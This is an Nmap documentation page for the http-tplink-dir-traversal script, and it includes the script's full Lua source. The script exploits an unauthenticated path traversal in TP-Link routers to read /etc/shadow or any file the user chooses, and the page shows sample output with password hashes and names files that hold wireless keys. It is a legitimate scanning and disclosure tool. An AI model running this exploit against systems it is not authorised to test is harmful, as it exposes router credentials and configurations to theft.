<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-tplink-dir-traversal</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth<br/>
<b>Author:</b> Paulino Calderon <calderon@websec.mx><br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/http-tplink-dir-traversal.nse">https://svn.nmap.org/nmap/scripts/http-tplink-dir-traversal.nse</a><br/>
<h3>Summary</h3>
<p>Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.</p>
<p>This vulnerability was confirmed in models WR740N, WR740ND and WR2543ND but there are several models that use the same HTTP server so I believe they could be vulnerable as well. I appreciate any help confirming the vulnerability in other models.</p>
<p>Advisory:</p>
<a href="http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740">http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740</a></p>
<p>Other interesting files:</p>
<ul>
<li>/tmp/topology.cnf (Wireless configuration)</li>
<li>/tmp/ath0.ap_bss (Wireless encryption key)</li>
</ul>
<h3>Arguments</h3>
<table>
<tr><td>http-tplink-dir-traversal.rfile:</td><td>Remote file to download. Default: /etc/passwd</td></tr>
<tr><td>http-tplink-dir-traversal.outfile:</td><td>If set it saves the remote file to this location. Other arguments you might want to use with this script:<ul><li>http.useragent - Sets user agent</li></ul></td></tr>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>vulns.short:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
<tr><td>vulns.showall:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -p80 --script http-tplink-dir-traversal.nse &lt;target&gt;
nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse &lt;target&gt;
nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn &lt;target&gt;</pre>
<h3>Output</h3>
<pre>PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-tplink-dir-traversal:
|   VULNERABLE:
|   Path traversal vulnerability in several TP-Link wireless routers
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
|       This vulnerability can be exploited remotely and without authentication.
|       Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
|       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
|     Disclosure date: 2012-06-18
|     Extra information:
|       /etc/shadow :
|
|   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   bin::10933:0:99999:7:::
|   daemon::10933:0:99999:7:::
|   adm::10933:0:99999:7:::
|   lp:*:10933:0:99999:7:::
|   sync:*:10933:0:99999:7:::
|   shutdown:*:10933:0:99999:7:::
|   halt:*:10933:0:99999:7:::
|   uucp:*:10933:0:99999:7:::
|   operator:*:10933:0:99999:7:::
|   nobody::10933:0:99999:7:::
|   ap71::10933:0:99999:7:::
|
|     References:
|_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/io.htm">io</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/vulns.htm">vulns</a></li>
</ul>
<h3>Code</h3>
<pre>description = [[
Exploits a directory traversal vulnerability existing in several TP-Link
wireless routers. Attackers may exploit this vulnerability to read any of the
configuration and password files remotely and without authentication.

This vulnerability was confirmed in models WR740N, WR740ND and WR2543ND but
there are several models that use the same HTTP server so I believe they could
be vulnerable as well. I appreciate any help confirming the vulnerability in
other models.

Advisory:
* http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740

Other interesting files:
* /tmp/topology.cnf (Wireless configuration)
* /tmp/ath0.ap_bss (Wireless encryption key)
]]

---
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse &lt;target&gt;
-- @usage nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse &lt;target&gt;
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn &lt;target&gt;
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-tplink-dir-traversal:
-- |   VULNERABLE:
-- |   Path traversal vulnerability in several TP-Link wireless routers
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
-- |       This vulnerability can be exploited remotely and without authentication.
-- |       Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
-- |       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
-- |     Disclosure date: 2012-06-18
-- |     Extra information:
-- |       /etc/shadow :
-- |
-- |   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- |   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- |   bin::10933:0:99999:7:::
-- |   daemon::10933:0:99999:7:::
-- |   adm::10933:0:99999:7:::
-- |   lp:*:10933:0:99999:7:::
-- |   sync:*:10933:0:99999:7:::
-- |   shutdown:*:10933:0:99999:7:::
-- |   halt:*:10933:0:99999:7:::
-- |   uucp:*:10933:0:99999:7:::
-- |   operator:*:10933:0:99999:7:::
-- |   nobody::10933:0:99999:7:::
-- |   ap71::10933:0:99999:7:::
-- |
-- |     References:
-- |_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
--
-- @args http-tplink-dir-traversal.rfile Remote file to download. Default: /etc/passwd
-- @args http-tplink-dir-traversal.outfile If set it saves the remote file to this location.
--
-- Other arguments you might want to use with this script:
-- * http.useragent - Sets user agent
--

author = &quot;Paulino Calderon &lt;calderon@websec.mx&gt;&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;vuln&quot;, &quot;exploit&quot;}

local http = require &quot;http&quot;
local io = require &quot;io&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local string = require &quot;string&quot;
local vulns = require &quot;vulns&quot;

portrule = shortport.http

local TRAVERSAL_QRY = &quot;/help/../..&quot;
local DEFAULT_REMOTE_FILE = &quot;/etc/shadow&quot;

---
--Writes string to file
--Taken from: hostmap.nse
local function write_file(filename, contents)
  local f, err = io.open(filename, &quot;w&quot;)
  if not f then
    return f, err
  end
  f:write(contents)
  f:close()
  return true
end

---
-- Checks if device is vulnerable by requesting the shadow file and looking for the pattern &#39;root:&#39;
---
local function check_vuln(host, port)
  local evil_uri = TRAVERSAL_QRY..DEFAULT_REMOTE_FILE
  stdnse.debug1(&quot;HTTP GET %s&quot;, evil_uri)
  local response = http.get(host, port, evil_uri)
  if response.body and response.status==200 and response.body:match(&quot;root:&quot;) then
    stdnse.debug1(&quot;Pattern &#39;root:&#39; found.&quot;)
    return true
  end
  return false
end

---
-- MAIN - The script checks for vulnerable devices by attempting to read &quot;etc/shadow&quot; and finding the pattern &quot;root:&quot;.
---
action = function(host, port)
  local response, rfile, rfile_content, filewrite
  local output_lines = {}

  filewrite = stdnse.get_script_args(SCRIPT_NAME..&quot;.outfile&quot;)
  rfile = stdnse.get_script_args(SCRIPT_NAME..&quot;.rfile&quot;) or DEFAULT_REMOTE_FILE

  local vuln = {
       title = &#39;Path traversal vulnerability in several TP-Link wireless routers&#39;,
       state = vulns.STATE.NOT_VULN,
       description = [[
Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
This vulnerability can be exploited without authentication.
Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.]],
       references = {
           &#39;http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740&#39;
       },
       dates = {
           disclosure = {year = &#39;2012&#39;, month = &#39;06&#39;, day = &#39;18&#39;},
       },
  }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  local is_vulnerable = check_vuln(host, port)
  if is_vulnerable then
    vuln.state = vulns.STATE.EXPLOIT
    response = http.get(host, port, TRAVERSAL_QRY..rfile)
    if response.body and response.status==200 then
      stdnse.debug2(&quot;%s&quot;, response.body)
      if response.body:match(&quot;Error&quot;) then
        stdnse.debug1(&quot;[Error] File not found:%s&quot;, rfile)
        vuln.extra_info = string.format(&quot;%s not found.\n&quot;, rfile)
        return vuln_report:make_output(vuln)
      end
      local  _, _, rfile_content = string.find(response.body, &#39;SCRIPT&gt;(.*)&#39;)
      vuln.extra_info = rfile..&quot; :\n&quot;..rfile_content
      if filewrite then
        local status, err = write_file(filewrite,  rfile_content)
        if status then
          vuln.extra_info = string.format(&quot;%s%s saved to %s\n&quot;, vuln.extra_info, rfile, filewrite)
        else
          vuln.extra_info = string.format(&quot;%sError saving %s to %s: %s\n&quot;, vuln.extra_info, rfile, filewrite, err)
        end
      end
    end
  end
  return vuln_report:make_output(vuln)
end</pre>
